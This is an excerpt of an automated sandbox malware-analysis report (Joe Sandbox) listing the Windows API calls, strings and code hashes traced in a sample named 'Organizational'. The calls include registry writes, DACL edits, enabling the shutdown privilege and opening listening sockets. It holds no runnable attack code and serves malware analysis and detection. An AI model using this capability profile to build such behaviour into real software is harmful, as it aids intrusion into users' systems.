                                                    • __swprintf.LIBCMT ref: 00F5D0A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: e0a86bc9a5e939fa059b522a4d35749e05bec13e72c07eb8dc110670dd452592
                                                    • Instruction ID: 5ed9acb3f17b75228c0d7fa6d61e9014a1e5619a3453a235050cf984cb512bfd
                                                    • Opcode Fuzzy Hash: e0a86bc9a5e939fa059b522a4d35749e05bec13e72c07eb8dc110670dd452592
                                                    • Instruction Fuzzy Hash: 10A13DB2504308ABD710EFA4CD86DBFB7ECBF94705F400919F68596191EB34EA08DB62
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F5F5F9
                                                    • _wcscmp.LIBCMT ref: 00F5F60E
                                                    • _wcscmp.LIBCMT ref: 00F5F625
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F5F637
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00F5F651
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F5F669
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F674
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F5F690
                                                    • _wcscmp.LIBCMT ref: 00F5F6B7
                                                    • _wcscmp.LIBCMT ref: 00F5F6CE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5F6E0
                                                    • SetCurrentDirectoryW.KERNEL32(00FAB578), ref: 00F5F6FE
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F5F708
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F715
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F727
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: d6cf969c3f69cadc56dce41bd40e061a73c305867a9228a55b53f4c6f9f70fd6
                                                    • Instruction ID: a8c8135fe93d137362472f3f1f2ade4f67155d2c89a644eaa0fdff4a8826f670
                                                    • Opcode Fuzzy Hash: d6cf969c3f69cadc56dce41bd40e061a73c305867a9228a55b53f4c6f9f70fd6
                                                    • Instruction Fuzzy Hash: B6318371A4121D6ADF109BA4AC4DAEE77AC9F09332F5401A5E904D21A0EF74DA8CEB64
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F70FB3
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F80980,00000000,?,00000000,?,?), ref: 00F71021
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F71069
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F710F2
                                                    • RegCloseKey.ADVAPI32(?), ref: 00F71412
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F7141F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: 2afbe5bad9135b87f88bd86cc920b84182a4ec5f475ac6a4abed708a76b54e1d
                                                    • Instruction ID: e27cd85c12a51ae4da9e1bcb9d0845d9a8a14565489615bd80918ff6ff6b136e
                                                    • Opcode Fuzzy Hash: 2afbe5bad9135b87f88bd86cc920b84182a4ec5f475ac6a4abed708a76b54e1d
                                                    • Instruction Fuzzy Hash: DF027E716006019FCB14EF28C841E6AB7E5FF89720F04855DF95A9B3A2CB35EC45DB92
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F5F756
                                                    • _wcscmp.LIBCMT ref: 00F5F76B
                                                    • _wcscmp.LIBCMT ref: 00F5F782
                                                      • Part of subcall function 00F54875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F54890
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F5F7B1
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F7BC
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F5F7D8
                                                    • _wcscmp.LIBCMT ref: 00F5F7FF
                                                    • _wcscmp.LIBCMT ref: 00F5F816
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F5F828
                                                    • SetCurrentDirectoryW.KERNEL32(00FAB578), ref: 00F5F846
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F5F850
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F85D
                                                    • FindClose.KERNEL32(00000000), ref: 00F5F86F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: 3a11110d005350468ff92b3b6c463a550855f8418f07cfc3ab953ba7cf64a3fc
                                                    • Instruction ID: e7775f7db34835bbd7d09c00befb44f4cb26a173e7b7be40f27acfefdebb2820
                                                    • Opcode Fuzzy Hash: 3a11110d005350468ff92b3b6c463a550855f8418f07cfc3ab953ba7cf64a3fc
                                                    • Instruction Fuzzy Hash: B431D87294021DAADF109BB4EC4CAEE77AC9F09332F1401A5ED14A21E1DB70DE8DBB54
                                                    APIs
                                                      • Part of subcall function 00F48E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F48E3C
                                                      • Part of subcall function 00F48E20: GetLastError.KERNEL32(?,00F48900,?,?,?), ref: 00F48E46
                                                      • Part of subcall function 00F48E20: GetProcessHeap.KERNEL32(00000008,?,?,00F48900,?,?,?), ref: 00F48E55
                                                      • Part of subcall function 00F48E20: HeapAlloc.KERNEL32(00000000,?,00F48900,?,?,?), ref: 00F48E5C
                                                      • Part of subcall function 00F48E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F48E73
                                                      • Part of subcall function 00F48EBD: GetProcessHeap.KERNEL32(00000008,00F48916,00000000,00000000,?,00F48916,?), ref: 00F48EC9
                                                      • Part of subcall function 00F48EBD: HeapAlloc.KERNEL32(00000000,?,00F48916,?), ref: 00F48ED0
                                                      • Part of subcall function 00F48EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F48916,?), ref: 00F48EE1
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F48931
                                                    • _memset.LIBCMT ref: 00F48946
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F48965
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F48976
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F489B3
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F489CF
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F489EC
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F489FB
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F48A02
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F48A23
                                                    • CopySid.ADVAPI32(00000000), ref: 00F48A2A
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F48A5B
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F48A81
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F48A95
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 79c0a2d762a91306a5e1d438d379183c3f1fbfddb8bbb980cf764ff799af78a2
                                                    • Instruction ID: e38815b82f5c65b2527bb5f12b0f38ce9da8733e3c092a42eb84eb2a96dc5672
                                                    • Opcode Fuzzy Hash: 79c0a2d762a91306a5e1d438d379183c3f1fbfddb8bbb980cf764ff799af78a2
                                                    • Instruction Fuzzy Hash: 15615A71900209BFDF01DF95EC49AFEBB79FF04354F04812AE815A6290DB759A06EB60
                                                    APIs
                                                      • Part of subcall function 00F7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7040D,?,?), ref: 00F71491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F70B0C
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F70BAB
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F70C43
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F70E82
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F70E8F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: a15be1b3ed0df2ae193b54b4dfc760b61f6541c6ca596f0b8d237d7ff008d933
                                                    • Instruction ID: 9a3eb8ca3d91b345db22167407e76072361796b258b52cfb8cc42a67200b4bb3
                                                    • Opcode Fuzzy Hash: a15be1b3ed0df2ae193b54b4dfc760b61f6541c6ca596f0b8d237d7ff008d933
                                                    • Instruction Fuzzy Hash: 4BE15B71604214EFC714DF28C891E6BBBE5EF89714F04896DF84ADB2A1DB30E905EB52
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 00F54451
                                                    • __swprintf.LIBCMT ref: 00F5445E
                                                      • Part of subcall function 00F138C8: __woutput_l.LIBCMT ref: 00F13921
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F54488
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00F54494
                                                    • LockResource.KERNEL32(00000000), ref: 00F544A1
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00F544C1
                                                    • LoadResource.KERNEL32(?,00000000), ref: 00F544D3
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00F544E2
                                                    • LockResource.KERNEL32(?), ref: 00F544EE
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F5454F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                    • String ID:
                                                    • API String ID: 1433390588-0
                                                    • Opcode ID: a93b6f52a90c404cb8594c1d36f8f5a36487d150e3f4a4bcb0d963cd1e474db7
                                                    • Instruction ID: 833c66ecb336b6087d883f67f7bbff9e0b31d79f74f817f903aa9b9e83035e09
                                                    • Opcode Fuzzy Hash: a93b6f52a90c404cb8594c1d36f8f5a36487d150e3f4a4bcb0d963cd1e474db7
                                                    • Instruction Fuzzy Hash: 7B31C37190121AABCB119F60EC48AFF7BACEF04356F444425FE11D2150EB74E955EB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: 347918585db27819eee6ef52e6bf2d30181ee310e5e60a9430cd95e4b9fed5ae
                                                    • Instruction ID: 2fba5d19684866be7fbda111f1af0834704c9b55f1cd1e35edae7a520101ead4
                                                    • Opcode Fuzzy Hash: 347918585db27819eee6ef52e6bf2d30181ee310e5e60a9430cd95e4b9fed5ae
                                                    • Instruction Fuzzy Hash: F4218131641214AFDB51BF60EC49F7E7BA8EF84721F008019FA069B2A1DF75AD11AB94
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F5FA83
                                                    • FindClose.KERNEL32(00000000), ref: 00F5FB96
                                                      • Part of subcall function 00EF52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF52E6
                                                    • Sleep.KERNEL32(0000000A), ref: 00F5FAB3
                                                    • _wcscmp.LIBCMT ref: 00F5FAC7
                                                    • _wcscmp.LIBCMT ref: 00F5FAE2
                                                    • FindNextFileW.KERNEL32(?,?), ref: 00F5FB80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 2185952417-438819550
                                                    • Opcode ID: a402e9269216a1f8b8d14a9c96a472ed99511fdeb327a200d9a28afeaa649033
                                                    • Instruction ID: ff1e317cc20482afe97cb7dc309894882303e9cb647038abbd04dc7d36410f3d
                                                    • Opcode Fuzzy Hash: a402e9269216a1f8b8d14a9c96a472ed99511fdeb327a200d9a28afeaa649033
                                                    • Instruction Fuzzy Hash: FB419071D0021AEFDF14DF64CC59AEEBBB4FF05351F1481A5E914A22A1EB349A48EB50
                                                    APIs
                                                      • Part of subcall function 00F49399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F493E3
                                                      • Part of subcall function 00F49399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F49410
                                                      • Part of subcall function 00F49399: GetLastError.KERNEL32 ref: 00F4941D
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00F557B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 3f9e153a3c79ee45c468be21fd2c0eebcc95ea6f764be1484076174df8a83f54
                                                    • Instruction ID: 54739065cc964e564a063be415ba5d1a7853d62022dab621c086c787d0356d81
                                                    • Opcode Fuzzy Hash: 3f9e153a3c79ee45c468be21fd2c0eebcc95ea6f764be1484076174df8a83f54
                                                    • Instruction Fuzzy Hash: 35014C71B4071EEAE72852B4BC6ABBB7758EB08F62F100015FE13D60D2D9545C0CB150
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F669C7
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F669D6
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F669F2
                                                    • listen.WSOCK32(00000000,00000005), ref: 00F66A01
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F66A1B
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00F66A2F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: a58cda2bd764b45e603c914ca4de0124ae8dee4042143096fa32e0b1c4b745ed
                                                    • Instruction ID: 5ba909a58aaa772c0b9946f8198af4622a655c653e85a386c27b47b030e21a0e
                                                    • Opcode Fuzzy Hash: a58cda2bd764b45e603c914ca4de0124ae8dee4042143096fa32e0b1c4b745ed
                                                    • Instruction Fuzzy Hash: AE21CE71600208AFCB00EFA4CC89A7EB7E9EF44720F148558E916F72D1CB34AC05EB90
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00EF1DD6
                                                    • GetSysColor.USER32(0000000F), ref: 00EF1E2A
                                                    • SetBkColor.GDI32(?,00000000), ref: 00EF1E3D
                                                      • Part of subcall function 00EF166C: DefDlgProcW.USER32(?,00000020,?), ref: 00EF16B4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 93dd1ef82fb523b71037e1f06b08b99a4e40041c2c7f530ad1710b565ffb91cb
                                                    • Instruction ID: fdc05cf7140b73eb67fbf3d4b4d4fadd84c99783c6847f8949996d394017e761
                                                    • Opcode Fuzzy Hash: 93dd1ef82fb523b71037e1f06b08b99a4e40041c2c7f530ad1710b565ffb91cb
                                                    • Instruction Fuzzy Hash: 44A17A7010951CFAD6286B299C49EFB36BDDF8131AF64518EFA01F6182CB269D01F372
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F5C329
                                                    • _wcscmp.LIBCMT ref: 00F5C359
                                                    • _wcscmp.LIBCMT ref: 00F5C36E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F5C37F
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F5C3AF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: 6c92936f7ebf8d559e6157553478b7911af846df2001c4ab0fed9f722eaf5547
                                                    • Instruction ID: f0508ae43172a163063130de50b7589198b3cee1f82b8bdb6ec571c9fc31dccf
                                                    • Opcode Fuzzy Hash: 6c92936f7ebf8d559e6157553478b7911af846df2001c4ab0fed9f722eaf5547
                                                    • Instruction Fuzzy Hash: CE518B75A047068FC714DF68C890EAAB7E4FF49321F104619EA56CB3A1DB30AD09EB91
                                                    APIs
                                                      • Part of subcall function 00F68475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F684A0
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F66E89
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F66EB2
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F66EEB
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F66EF8
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00F66F0C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 545976cbe8d36fcb778eedf7ff6129038e0e3bd81037ed887d3ee20ba3cd0b26
                                                    • Instruction ID: ba3bd517b22c7b908cc20e3e120360b898d83ba9b2bb81989a8b86b26386d2cd
                                                    • Opcode Fuzzy Hash: 545976cbe8d36fcb778eedf7ff6129038e0e3bd81037ed887d3ee20ba3cd0b26
                                                    • Instruction Fuzzy Hash: 6341A1B6700218AFEB10AF64DC86F7F77E89B44714F048558FA16AB3D2DB719D009BA1
                                                    APIs
